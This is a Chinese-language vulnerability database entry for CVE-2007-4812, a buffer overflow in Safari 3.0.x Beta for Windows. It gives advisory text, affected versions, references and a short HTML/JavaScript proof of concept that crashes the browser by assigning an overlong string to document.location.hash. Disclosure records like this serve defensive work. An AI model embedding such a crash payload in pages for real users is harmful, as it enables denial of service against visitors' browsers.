Apple Safari for Windows Document.Location.Hash 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113185 漏洞类型 缓冲区溢出
发布时间 2007-06-25 更新时间 2007-11-15
CVE编号 CVE-2007-4812 CNNVD-ID CNNVD-200709-108
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/30767
https://www.securityfocus.com/bid/26448
https://cxsecurity.com/issue/WLB-2007090028
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-108
|漏洞详情
AppleSafari3.0.3522.15.5和BetaUpdate3.0.4之前的其他版本存在缓冲区溢出漏洞使远程攻击者通过对一个超长的字符串设置document.location.hash造成拒绝服务(崩溃)和可能的未明影响。
|漏洞EXP
source: http://www.securityfocus.com/bid/26448/info

Safari for Windows is prone to a buffer overflow that occurs when an attacker entices a victim to view a maliciously crafted webpage.

A remote attacker may exploit this issue to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. 

<html> <body> <script> var maxbuf = 65474; buff = "A"; for (i=0;i<maxbuf;i++) { buff = buff+"A"; } document.location.hash = buff+"BOW! "; alert(document.location.hash); </script> </body> </html>
|受影响的产品
Apple Safari 3.0.3 Beta for Windows Apple Safari 3.0.2 Beta for Windows Apple Safari 3.0.1 Beta for Windows Apple Safari 3 Beta for Windows
|参考资料

来源:BID
名称:26448
链接:http://www.securityfocus.com/bid/26448
来源:BUGTRAQ
名称:20070907Safari3.0.3(522.15.5)Bufferoverflow
链接:http://www.securityfocus.com/archive/1/archive/1/478802/100/0/threaded
来源:SREASON
名称:3111
链接:http://securityreason.com/securityalert/3111
来源:OSVDB
名称:43971
链接:http://osvdb.org/43971
来源:APPLE
名称:APPLE-SA-2007-11-14
链接:http://lists.apple.com/archives/Security-announce/2007/Nov/msg00003.html